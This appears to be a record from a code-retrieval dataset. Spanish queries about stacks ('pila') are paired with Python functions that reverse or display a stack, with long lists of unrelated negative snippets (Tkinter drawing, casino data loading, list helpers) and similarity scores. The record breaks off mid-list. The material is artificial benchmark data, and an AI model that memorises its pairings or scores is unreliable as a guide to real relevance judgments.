self.telaMAPA.create_image(k[0], k[1], image=self.imgMesa, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Se deseo pintar una nevera\n if self.queIMGAgregar == 3:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgNevera, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar una cama\n if self.queIMGAgregar == 4:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgCama, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar un sofa\n if self.queIMGAgregar == 5:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgSofa, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar tv\n if self.queIMGAgregar == 6:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgTV, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar lampara\n if self.queIMGAgregar == 7:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgLampara, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar planta\n if self.queIMGAgregar == 8:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgPlanta, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar sanitario\n if self.queIMGAgregar == 9:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgSanitario, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar lavamanos\n if self.queIMGAgregar == 10:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgLavamanos, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1\n\n # Si deseo pintar la ducha\n if self.queIMGAgregar == 11:\n self.telaMAPA.create_image(k[0], k[1], image=self.imgDucha, tag=k[2])\n # Como fue agregado un elemento en el mapa procedo a registrarlo\n self.cotroladoraIMGREG.append(k)\n # Como una img fue agregada procedo a aumentar el id\n self.idIMG = self.idIMG + 1", "def get_janaka(self, chakra_list):\n if self.janaka_melam is None:\n self.janaka = None\n else:\n for c in chakra_list:\n if c.melam == self.janaka_melam:\n self.janaka = c.raga\n break", "def getDialogo(self):\n ##print self.html_version_taquigrafica\n # bsp = BeautifulSoup(self.html_version_taquigrafica)\n bsp = self.html_version_taquigrafica\n\n expresiones = bsp.find_all('span')\n\n texto = ''\n for elemento in expresiones:\n texto += elemento.getText()\n\n self.dialogo = texto", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)" ]
[ "0.62369305", "0.5968242", "0.5968242", "0.5929463", "0.5875082", "0.5795964", "0.574635", "0.57377017", "0.56929976", "0.566961", "0.5612241", "0.5606185", "0.5604151", "0.55805415", "0.55805415", "0.5572482", "0.555679", "0.5539605", "0.5539363", "0.5522629", "0.55216", "0.5502805", "0.5500729", "0.5494472", "0.5476412", "0.547567", "0.54575396", "0.54571426", "0.5414721", "0.5413411", "0.5403159", "0.5395007", "0.5390921", "0.538678", "0.53858864", "0.53803855", "0.5359159", "0.5351229", "0.53297687", "0.52979463", "0.52803993", "0.52791303", "0.5279097", "0.5275243", "0.52733624", "0.52677566", "0.52608407", "0.52383065", "0.5235578", "0.52286077", "0.5217836", "0.520704", "0.5197743", "0.5188273", "0.518722", "0.5186829", "0.5182565", "0.5181358", "0.5170608", "0.5129843", "0.51250803", "0.5118556", "0.5110356", "0.51101696", "0.5109262", "0.51089084", "0.51063704", "0.5105948", "0.50975096", "0.5096495", "0.50912434", "0.50855166", "0.5078298", "0.50738776", "0.50717294", "0.5070376", "0.50662875", "0.50654304", "0.5063011", "0.50610554", "0.5059223", "0.5054305", "0.5054033", "0.50510144", "0.50507355", "0.5046151", "0.50412935", "0.5040632", "0.5040632", "0.50334966", "0.50330347", "0.5032129", "0.50301397", "0.5023303", "0.5022693", "0.5022614", "0.50213677", "0.50162494", "0.5014721", "0.500955" ]
0.6678378
0
Muestra todos elementos en pila
def barrido(pila): paux = Pila() while not pila_vacia(pila): dato = desapilar(pila) print(dato) apilar(paux, dato) while not pila_vacia(paux): apilar(pila, desapilar(paux))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def list(self):", "def listar_gabarito():\n return GabaritoProva.listar(gabarito)", "def listadoServicio(listServicios,codigoReserva):\n try:\n if(codigoReserva!=\"\"):\n variables.listado = listar(codigoReserva)\n listServicios.clear()\n for registro in variables.listado:\n listServicios.append(registro)\n except Exception as e:\n print(\"error en cargar treeview servicios\")\n print(e)", "def list():", "def list():", "def elems(self):", "def on_btnLista_clicked(self,guardar):\n XerarInformes()", "def items(self):", "def items():", "def Leer_Pila(self, *elementos):\n for k in elementos:\n self.Push(k)", "def listar_cadastros():\n return cadastro_alunos.listar_aluno()", "def listaNacionalidades():\n nac = NacionalidadModel()\n\n return nac.listarTodos()", "def Obtener_Lista(self):\n\t\treturn [self,self.Nombre+\" \"+self.Apellido,self.ID,self.Fecha, \n\t\tself.Edad,self.Test,self.Posicion,self.Prioridad,self.Progreso,self.Informe]", "def get_element_list(self):\n pass", "def updateLstAllElement(self):\n self.lstAllElement=[self.idVet, self.libelle,self.marque,self.quantite,self.prixHTVA,self.tauxTVA,self.taille,self.categorie,self.couleur,self.lstAssorti]", "def obtener_productos():\n\n # Se crea la lista de objetos Producto()\n productos = [\n Producto(\"Caja chica\", 5, 100.0),\n Producto(\"Caja mediana\", 3, 185.0),\n Producto(\"Caja grande\", 1, 299.0)\n ]\n\n return productos", "def listaSangre():\n san = SangreModel()\n\n return san.listarTodos()", "def obter_lista_arquivos(self):\n if os.path.exists(self.caminho):\n return [arq for arq in self.obter_lista_conteudo() \\\n if os.path.isfile(arq)]\n else:\n return []", "def select_todos_registros(nome_tabela: str) -> list:\n query = f'SELECT * FROM {nome_tabela};'\n\n lista_registros = banco_operacoes(query)\n\n return lista_registros", "def list(self, *args):\n return []", "def apilar(self,dato):\r\n\t\tself.elementos.append(dato)\r\n\t\tself.len += 1", "def consultar_todos_DB(self):\n registros = db.session.query(ModelConcurso).all()\n for registro in registros:\n print(registro)", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def _setup():\n for item in dominos:\n queue.append([item])", "def items(self) -> List:\n pass", "def todos(self):\n socios = session.query(Socio).all()\n return socios", "def __init__(self):\n mi_parqueo = list()", "def __init__(self, nombre_depto, id_depto):\n self.nombre_depto = nombre_depto\n self.id_depto = id_depto\n self.empleados = []", "def listadohab(listhab):\n try:\n variables.listado = listarhab()\n variables.listhab.clear()\n for registro in variables.listado:\n listhab.append(registro)\n except:\n print(\"error en cargar treeview de hab\")", "def listadohab(listhab):\n try:\n variables.listado = listarhab()\n variables.listhab.clear()\n for registro in variables.listado:\n listhab.append(registro)\n except:\n print(\"error en cargar treeview de hab\")", "def list_all_tags(self,obs):", "def listar(self):\n conn = None\n\n try:\n params = config()\n conn = psycopg2.connect(**params)\n cur = conn.cursor()\n cur.execute(\"SELECT id_aluno, nome_aluno, cpf_aluno, data_nasc_aluno, telefone_aluno FROM Alunos\")\n\n # Imprime o número de alunos cadastrados.\n print(f\"\\nHá {cur.rowcount} aluno(s) cadastrado(s): \")\n row = cur.fetchone()\n\n while row is not None:\n print(f\"\\nID: {row[0]}\\nNome: {row[1]}\\nCPF: {row[2]}\\nData de Nascimento: {row[3].strftime('%d/%m/%Y')}\\nTelefone: {row[4]}\\n\")\n row = cur.fetchone()\n \n cur.close()\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n \n finally:\n if conn is not None:\n conn.close()", "def getItemsInDialog(elm):\n items = []\n items.extend(getAllChildrenWithTagName(elm, \"control\"))\n return items", "def cambiar_Fichas(self,lista):\n self.rellenar_atril()\n for letra in lista:\n self.bolsa.agregar_bolsa(letra, 1)\n random.shuffle(self.bolsa.bolsa)", "def _get_elements(cls):\n raise NotImplementedError()", "def find_all(self):", "def objects(self):", "def obtener_comentarios(idActividad):\n comentarios = Comentario.objects.filter(idactcomentario=idActividad)\n lista = []\n for elem in comentarios:\n lista.append(elem)\n return lista", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def listar_proyectos(request):\n proyectos = Proyecto.objects.all()\n PROYECTOS_USUARIO= CantProyectos(request)\n cant = len(PROYECTOS_USUARIO)\n context={\n 'proyectos':proyectos,###### TODOS LOS PROYECTOS\n 'list': PROYECTOS_USUARIO,##PROYECTOS DEL USUARIO LOS CUAL SE DEBE MOSTRAR, SOLO ID\n 'cant': cant####CANTIDAD DE PROYECTOS QUE POSEE\n }\n return render(request, 'Menu/listar_proyectos.html', context)", "def getList(self):", "def getList(self):", "def all(self):", "def all(self):", "def list_all(self):\n\n url = 'equipamento/list/'\n\n code, xml = self.submit(None, 'GET', url)\n\n return self.response(code, xml)", "def get_all_menu():", "def hacer_alineamiento(lista_nombres):\n \n archivos_muscle=[]\n for i in lista_nombres:\n alinea = ['muscle','-in',i,'-out',(i+\"_alinea_muscle\")]\n hacer=Popen(alinea,stdout = PIPE)\n hazlo=hacer.stdout.read()\n hacer.stdout.close()\n archivos_muscle.append(i+\"_alinea_muscle\")#El nombre del archivo del alineamiento será el obtenido\n #en parsear seguido _alinea_muscle\n \n return archivos_muscle", "def listaProfesion():\n prof = ProfesionModel()\n\n return prof.listarTodos()", "def _get_all_elems(self, protein_id: int):\n path_protein, _ = self._get_path(protein_id)\n try:\n # mol_pocket = Molecule(path_protein)\n mol_protein = Molecule(path_protein)\n mol_protein.filter('protein')\n if (self.type_feature == \"bio_properties\" or self.type_feature == \"bio_all_properties\"):\n mol_protein = prepareProteinForAtomtyping(mol_protein, verbose = False)\n mol_pocket_element = mol_protein.element\n except FileNotFoundError:\n print(protein_id, \" exception\")\n path_protein, path_lig = self._get_path(2)\n mol_pocket = Molecule(path_protein)\n mol_pocket_element = mol_pocket.element\n return mol_pocket_element", "def __init__(self):\n self.liste = []", "def __init__(self):\r\n self.lis = []", "def AllSubElements(self):\n return []", "def getListOfAllElements(self, *args):\n return _libsbml.SBasePlugin_getListOfAllElements(self, *args)", "def busqueda_por_atributo(self, atributo, valor):\n\n paquetes = []\n\n if atributo == \"Número de dormitorios\":\n for casa in self.casas:\n if casa.numero_dormitorios >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Número de baños\":\n for casa in self.casas:\n if casa.numero_banos >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Numero de cocinas\":\n for casa in self.casas:\n if casa.numero_cocinas >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)", "def elems(self):\n pass", "def _get_elements(self):\n return self._elements", "def __init__(self):\n\n self.notas = []", "def __local_pe(soup):\n news = []\n list_items = soup.find('div', class_='maisVistas').find_all(\n 'li', class_='texto')\n\n for li in list_items:\n title = li.a.string\n link = li.a['href']\n news.append(dict(title=title, link=link))\n return news", "def list(\n self,\n name,\n ):\n pass", "def get_elements(self):\n return self.elements", "def __local_pe(soup):\n news = []\n list_items = soup.find('div', class_='maisVistas').find_all('li', class_='texto')\n\n for li in list_items:\n title = li.a.string\n link = li.a['href']\n news.append(dict(title=title, link=link))\n return news", "def carregar_contatos(self):\r\n self.clientes = []\r\n fornecedor = SistemaFornecedor()\r\n fornecedor.carregar_arquivo('')\r\n for contato in fornecedor.fornecedores:\r\n self.adicionar_cliente(contato.nome, '', [contato.telefone], [contato.email], empresa='')\r\n return len(self.clientes)", "def get_items(self):\n return []", "def returnIdDadosPessoais(self):\r\n self.cursor.execute(\"SELECT DOCUMENTO FROM DADOS_PESSOAIS;\")\r\n self.__result = self.cursor.fetchall()\r\n self.__lista = []\r\n try:\r\n for self.__i in self.__result:\r\n self.__lista.append(self.__i[0])\r\n return self.__lista\r\n except:\r\n return []", "def send_command_to_all(self, comando, parametros=None):\n for usuario in self.clientes.copy():\n self.send_command(comando, usuario, parametros)", "def obter_lista_sub_pastas(self):\n ##TO DO: não retornar links para arquivos\n if os.path.exists(self.caminho):\n return [arq for arq in self.obter_lista_conteudo() \\\n if not os.path.isfile(arq)]\n else:\n return[]", "def cargarObras(self):\n self.cargarObjetos(self.tableOs,\n ObraSocialModel.buscarTodos(\"razon_social\", self.sesion).all(),\n (\"razon_social\", \"cuit\", \"direccion\")\n )", "def obtenir_joueurs(self, tournoi):\n i = 1\n for x in range(0, NOMBRE_JOUEURS):\n # collect player via view\n infos = self.vue.demander_info_joueur(i)\n joueur = Joueur(infos)\n # add to the list of players\n tournoi.enregistrer_joueur(joueur)\n i += 1", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def _elements(self):\n return list(islice(self.generate(), None))", "def get_elements(cls, m):\n raise NotImplementedError", "def find_all(self):\n pass", "def get_all(self):\n list = []\n line = self.get()\n while line:\n list.append(line)\n line = self.get()\n return list", "def get_listu_postaja(self):\n popis = sorted(list(self.postaje))\n return popis", "def __init__(self):\n self.tiempos = ListaEnlazada() # Marcas de tiempo\n self.tracks = [] # Lista de tracks", "def get_all() -> list:\n categorias = []\n conn = GenericDao.connect()\n cursor = conn.execute(\"SELECT * FROM categorias\")\n for row in cursor:\n categoria = Categoria(row[1], row[0])\n categorias.append(categoria)\n if debug:\n print(str(categoria))\n\n conn.close()\n return categorias", "def iter(self):\n return []", "def test_3_listautor(self): \n [i for i in self.app._listarAutores()]\n self.app.getAutores()", "def listar(channel, where, ebrios):\n if ebrios[where]:\n response = 'Los que se coparon en ' + where + ':'\n for ebrio in ebrios[where]:\n response += '\\n' + vos_quien_sos(ebrio) + ''\n else:\n response = 'No hay after armado en ' + where + \\\n ', podrías armar uno <@' + user + '>'\n postea(channel, response)", "def getElements(self):\n\telements = self.listFolderContents() \n\treturn elements", "def all(cls):\n return []", "def get_all_products(self):\n\t\tpass", "def __armar_podio(self, participantes):\n podio = []\n \n while len(podio) < 3:\n participante_mejor_puntaje = self.__calcular_disparo_ganador(participantes)\n podio.append(participante_mejor_puntaje)\n for disparo in participantes:\n if disparo['puntaje_total'] == participante_mejor_puntaje['puntaje_total']:\n participantes.remove(disparo)\n return podio", "def generar_poblacion():\n poblacion = []\n ind = Arbol()\n for i in range(size_pop):\n poblacion.append(generar_individuo_recursivo(ind))\n return poblacion", "def getListOfAllElementsFromPlugins(self, *args):\n return _libsbml.SBase_getListOfAllElementsFromPlugins(self, *args)", "def bloquear_todo(mapa):\n \n for e in mapa.mapa:\n mapa.alternar_bloque(e)", "def __bol(soup):\n news = []\n anchors = soup.find(\n 'div', class_='mais-clicadas-lista link-primary').find_all('a')\n\n for a in anchors:\n title = a.find('span', class_='mais-clicadas-item-content').text\n link = a['href']\n news.append(dict(title=title, link=link))\n return news", "def abrir(self):\n assert self.open == False\n self.ne = [n for n in self.ne]\n self.je = [e1 for e1 in self.je]\n self.ie = []\n self.open = True", "def podruhe():\n mylist = [x for x in range(3)]\n for element in mylist:\n print element", "def elements(self):\n return self.q", "def _list(self):\n raise NotImplementedError", "def test_listes():\n listes = [Liste(mot) for mot in (\"SE\", \"PAS\", \"DE\", \"DEVIS\")]\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[0] apres liste[1], puis un mot vide\")\n listes[1].suffixe(listes[0])\n listes[1].suffixe(Liste(\"\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute listes[1] apres listes[2] et listes[0] apres listes[3]\")\n listes[2].suffixe(listes[1])\n listes[3].suffixe(listes[0])\n data_tycat(listes)\n _ = input()\n print(\"on efface 'DEVIS'\")\n del listes[3]\n data_tycat(listes)\n _ = input()\n # # test dans le cas où le doublage ne se fait pas à la tête de la liste\n # print(\"on efface 'DEPASSE'\")\n # del listes[2]\n # data_tycat(listes)\n # _ = input()\n print(\"on ajoute 'NT' apres 'PASSE'\")\n listes[1].suffixe(Liste(\"NT\"))\n data_tycat(listes)\n _ = input()\n print(\"on ajoute 'SE' apres elle-meme\")\n listes[0].suffixe(listes[0])\n data_tycat(listes)\n # # supression de SE\n # _ = input()\n # print(\"on efface 'SE'\")\n # del listes[0]\n # data_tycat(listes)", "def clear_elements(self):\n\n pass", "def get_all(self,empty=True):\n with self.lock:\n items = self.items\n if empty: self.items = []\n return items", "def consultI(listaI): # Esta sección fue hecha por Ángel\n for fila in listaI:\n print(\"\\n\")\n for elemento in fila:\n print(elemento + \"\\t\",end = \"\")", "def get_products(self):\n\n lst = []\n for product in self.products.findall('product'):\n id = product.find('id').text\n name = product.find('name').text\n dispensary_id = product.find('dispensary_id').text\n dispensary_name = product.find('dispensary_name').text\n canabis_brand = product.find('canabis_brand').text\n canabis_strain = product.find('canabis_strain').text\n category = product.find('category').text\n subcategory = product.find('subcategory').text\n thc_level = product.find('thc_level').text\n cbd_level = product.find('cbd_level').text\n cbn_level = product.find('cbn_level').text\n thc_level_type = product.find('thc_level_type').text\n cbd_level_type = product.find('cbd_level_type').text\n cbn_level_type = product.find('cbn_level_type').text\n\n description = product.find('description').text\n created_at = product.find('created_at').text\n updated_at = product.find('updated_at').text\n\n prices = []\n urls = []\n images = []\n\n for child in product:\n if child.tag == 'prices':\n for cost in child.findall('cost'):\n prices.append(Price(cost.attrib['unit'], cost.text))\n\n if child.tag == 'urls':\n admin = child.find('admin').text\n public = child.find('public').text\n urls.append(UrlInfo(admin, public))\n\n if child.tag == 'images':\n for image in child.findall('image'):\n images.append(Image(image.attrib['main'], image.text,))\n\n lst.append(Product(id, name, dispensary_id, dispensary_name,\n canabis_brand, canabis_strain,\n category, subcategory, thc_level, cbd_level,\n cbn_level, thc_level_type, cbd_level_type,\n cbn_level_type, prices, urls, images,\n description, created_at, updated_at))\n\n return lst", "def creaLE(venta): #Esta sección fue hecha por Ángel\n listaPGA = [] # Esto genera la lista necesaria para pasarlo al archivo\n for elemento in venta:\n listaN = elemento[0] + \",\"\n listaN += str(elemento[1]) + \"\\n\"\n listaPGA.append(listaN)\n return listaPGA", "def find_elements(self, elements: List[WebElement]) -> List[WebElement]:\n return elements", "def scraper_lista_articoli(LINK_SOS_FANTA: str) -> list:\n soup = BeautifulSoup(requests.get(LINK_SOS_FANTA).text, \"html.parser\")\n body = soup.find(class_=\"widget-content\")\n titoli = body.find_all(\"li\") # lista di tutti gli articoli\n\n to_scrape = []\n for post in titoli:\n # parsing della data in italiano, devo pulirla\n data_pubblicazione = (\n post.find(class_=\"post-meta\").text.replace(\"del\", \"\").replace(\"alle\", \"\")\n )\n parsed_data = dateparser.parse(data_pubblicazione, languages=[\"it\"])\n\n # solo ultimi 4 giorni, se ne trovo uno vecchio esco dal loop\n if parsed_data < datetime.now() - timedelta(days=4):\n return to_scrape\n\n # aggiungo link\n link = post.find(\"a\", href=True)\n to_scrape.append(link[\"href\"])\n\n # caso post \"a scheda\": sono divisi in categorie, aggiungo link multipli\n post_multipli = {\"PORTIERI\": 3, \"ATTACCO\": 8}\n for caso in post_multipli.keys():\n if caso in link[\"title\"]:\n # la struttura della pagina sarà link/1/, link/2/ etc..\n for i in range(post_multipli.get(caso)):\n to_scrape.append(link[\"href\"] + f\"{i}/\")\n return to_scrape", "def getItemsInContainer(elm):\n items = []\n items.extend(getAllChildrenWithTagName(elm, \"action\"))\n items.extend(getAllChildrenWithTagName(elm, \"container\"))\n switches = getAllChildrenWithTagName(elm, \"switch\")\n for sw in switches:\n items.extend(getAllChildrenWithTagName(sw, \"action\"))\n items.extend(getAllChildrenWithTagName(sw, \"container\"))\n return items" ]
[ "0.6206592", "0.6027048", "0.60082996", "0.5969509", "0.5969509", "0.5953642", "0.5931115", "0.58567864", "0.5827238", "0.5822924", "0.5788263", "0.5785534", "0.578256", "0.57585746", "0.5745181", "0.57410586", "0.5723462", "0.57228816", "0.56660974", "0.5607361", "0.5586085", "0.5582145", "0.55717856", "0.55658436", "0.5565693", "0.5552789", "0.55487347", "0.55457777", "0.5544971", "0.5544971", "0.55161697", "0.55011433", "0.5496019", "0.5461866", "0.54602605", "0.544918", "0.54358995", "0.5424959", "0.54167145", "0.5407721", "0.5406398", "0.5406398", "0.5389742", "0.5389742", "0.53824353", "0.5376591", "0.5360513", "0.5358852", "0.5358427", "0.53572756", "0.532748", "0.5322413", "0.5307969", "0.52971476", "0.5296181", "0.52920514", "0.5290406", "0.52892023", "0.5287323", "0.5286989", "0.5285555", "0.52803636", "0.5278413", "0.5272213", "0.5265613", "0.5264786", "0.52481985", "0.5242411", "0.523939", "0.523939", "0.52349114", "0.52331007", "0.5230684", "0.5228635", "0.5228371", "0.5227485", "0.5224506", "0.522105", "0.52207285", "0.5212097", "0.52102625", "0.5209215", "0.52090645", "0.5202283", "0.52003974", "0.519818", "0.51955664", "0.51890385", "0.51822", "0.51673275", "0.5166427", "0.5165206", "0.5165181", "0.51633286", "0.5150986", "0.5150877", "0.5150189", "0.5146393", "0.51429224", "0.5140543", "0.5132243" ]
0.0
-1
Devuelve la pila invertida
def invertir(pila1): pila2 = Pila() while not pila_vacia(pila1): apilar(pila2, desapilar(pila1)) return pila2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __invert__(self):\n return self.inverse()", "def inverse(self, x, y):", "def __invert(self, args):", "def invert(self,el):\n return el^(self.q-2)", "def invert(self):\n tmp = self.pvt\n self.pvt = self.nvt\n self.nvt = tmp\n tmp = self.pFace\n self.pFace = self.nFace\n self.nFace = tmp", "def inverse(self):\n def inv(v):\n v[0], v[1] = v[1] , v[0]\n for v in [self.point1 , self.pointN , self.unitv, self.normalv]:\n inv(v)\n\n self.points = numpy.roll(self.points,1,axis=1)\n self.a, self.b = self.b, self.a\n self.angle = numpy.arccos( self.unitv[0] )*numpy.sign(self.unitv[1] )\n return", "def invert(self):\n raise NotImplementedError()", "def scale_invert(self):", "def invert(self, img):\n return self.inverse()(img)", "def inverse(self):\n return self.invert()", "def __invert__(self):\n a = self.angle\n x, y = Vector.cartesian([1, a])\n return Vector(x, y)", "def modular_inverse(self):\n i = gmpy2.invert(self.c2, self.n)\n mx = pow(self.c1, self.a, self.n)\n my = pow(i, int(-self.b), self.n)\n self.m= mx * my % self.n", "def __invert__(self):\r\n return 1 - self", "def __invert__(self):\n return self.reverse()", "def flip(self, p):\n return -p", "def flip(self):", "def invert(x):\n return linalg.inv(x)", "def invert(self):\n self._c = ~self._c", "def invert (y):\n\n if eq(y,pos) : return y\n elif lt(y,nil) : return neg(invert(neg(y)))\n elif eq(y,nil) : raise ZeroDivisionError()\n yl,yr = split(y)\n il = nil\n ir = None\n r = None,None\n iyr,iyl = None,None\n width = 0\n while (il or ir) and width < 3:\n width += 1\n nl = nr = None\n if il is not None:\n r = (il,r[1])\n if yr is not None:\n if iyr is None:\n #iyr = ~yr\n iyr = invert(yr)\n left = mul(mul(add(pos,sub(yr,y)),il),iyr)\n if r[0] is None or gt(left,r[0]):\n nl = left\n if yl is not None and not le(yl,nil):\n if iyl is None:\n #iyl = ~yl\n iyl = invert(yl)\n right = mul(mul(add(pos,sub(yl,y)),il),iyl)\n if r[1] is None or lt(right,r[1]):\n nr = right\n if ir:\n r = (r[0],ir)\n if yl is not None and not le(yl,nil):\n if iyl is None:\n #iyl = ~yl\n iyl = invert(yl)\n left = mul(mul(add(pos,sub(yl,y)),ir),iyl)\n if r[0] is None or (gt(left,r[0]) and (not nl or gt(left,nl))):\n nl = left\n if yr is not None:\n if iyr is None:\n #iyr = ~yr\n iyr = invert(yr)\n right = mul(mul(add(pos,sub(yr,y)),ir),iyr)\n if r[1] is None or (lt(right,r[1]) and (not nr or lt(right,nr))):\n nr = right\n il,ir = nl,nr\n #print(r)\n if r[0] is None: r = (0,r[1])\n if r[1] is None: r = (r[0],0)\n return join(*r)", "def __invert__(self):\n return BitBoard(~self.num)", "def __invert__(self):\r\n if self.field.characteristic == 2:\r\n return runtime.invert(self)\r\n\r\n return super().__invert__()", "def __invert__(self):\n return self.fam.c_unop('invert', self)", "def opposite(direction):\n return (direction+2)%4", "def __invert__(self) -> Operators:\n return self.operate(inv)", "def invert(self):\n self.vertices.reverse()", "def __invert__(self):\n \n return Vector(-self.y, self.x)", "def __invert__(self):\n return self.negated()", "def __invert__(self):\n return self.__neg__()", "def __invert__(self):\n return Factorization([(p,-e) for p,e in reversed(self)],\n cr=self._cr(), unit=self.unit()**(-1))", "def inv(self):\n return self.conjugate()", "def _r_inv(self):\n raise NotImplementedError", "def inv_inplace(a):", "def inverse_transform(v):\n v, k = divmod(v - 1, N)\n v, j = divmod(v, N)\n v, i = divmod(v, N)\n return i, j, k", "def __invert__(self):\r\n return self.__class__(self._real, -self._imag)", "def revise():", "def inverse(self) -> 'Invertible':\n raise NotImplementedError", "def __invert__(self):\n a = self.array_form\n n = len(a)\n inv_form = [0] * n\n for i in xrange(n):\n inv_form[a[i]] = i\n return _new_from_array_form(inv_form)", "def _inv(self) -> None:\n\n self.inv(inplace=True)", "def lr_flip(self):\n for g in self.grid:\n g.reverse()", "def invert(self, transformed_input):\n return transformed_input * self.__diff + self.low", "def _invert(G):\n return Surreal.from_value(1 / G._n)", "def invert_inplace(a):", "def inverse(self):\n return ~self", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def inverse_transform(self, X):\n ...", "def support_inverse(rho):\n return LA.pinv(rho)", "def __invert__(self):\n return self.wc", "def __invert__(self):\n return self.wc", "def invert(self):\n return self._invert", "def invert_L2_wdls():\n print()", "def inverse(im): \t \n x,y = np.shape(im)\n img = np.zeros([x,y])\n\t\n for i in range(x):\n for j in range(y):\n img[i,j] = 255 - im[i,j]\n return img", "def _get_inv(self):\n m,d = self.B.shape\n Im = np.eye(m)\n Id = np.eye(d)\n BBt = self.B@self.B.T\n I_BBt_inv = np.linalg.pinv(Im + BBt)\n \n return (1/self.alpha)*(Id - self.B.T@( I_BBt_inv@self.B/self.alpha))", "def inverse(self):\n return self._inverse", "def __invert__(self):\n try:\n B = ~(self.matrix())\n except ZeroDivisionError:\n raise ZeroDivisionError(\"matrix morphism not invertible\")\n try:\n return self.parent().reversed()(B)\n except TypeError:\n raise ZeroDivisionError(\"matrix morphism not invertible\")", "def invert(self, transformed_input):\n raise NotImplementedError()", "def test_inverse_transform(self):", "def opposite(x):\n return -1*x", "def __invert__(self) -> PointType:\n return Point(~self.x, ~self.y)", "def inv(self, y):\n pass", "def inverted( self ):\n return self._modifier(\n self,\n lambda x: invert_bits( x, self.nr_of_pins )\n )", "def inverse_transform(self, y: Array2D) -> Array2D:", "def inverse(self: T) -> T:", "def inverse_el(el: Fp, p: int) -> Fp:\n return pow(int(el), p-2, p)", "def inv(P):\n L = cho_factor(P)\n return cho_solve(L, np.eye(P.shape[0]))", "def invert( self ) :\n\n series_ = self.copy( )\n for l in xrange( 1, len( series_ ), 2 ) : series_.coefficients[l] *= -1\n return( series_ )", "def pseudoInversa(J):\n\tJinv = np.linalg.pinv(J)\n\treturn Jinv", "def invert(self) -> Frame:\n return Inverse(self)", "def invert(self):\n\t\tself.bitmap_data = \"\".join([chr(255-ord(x)) for x in self.bitmap_data])\n\t\treturn self", "def invert(array):\n\n f = [1, 1, 1]\n\n result = np.array(array)\n\n for row in range(result.shape[0]):\n for pixel in range(result.shape[1]):\n result[row][pixel] = f - result[row][pixel]\n\n return result", "def 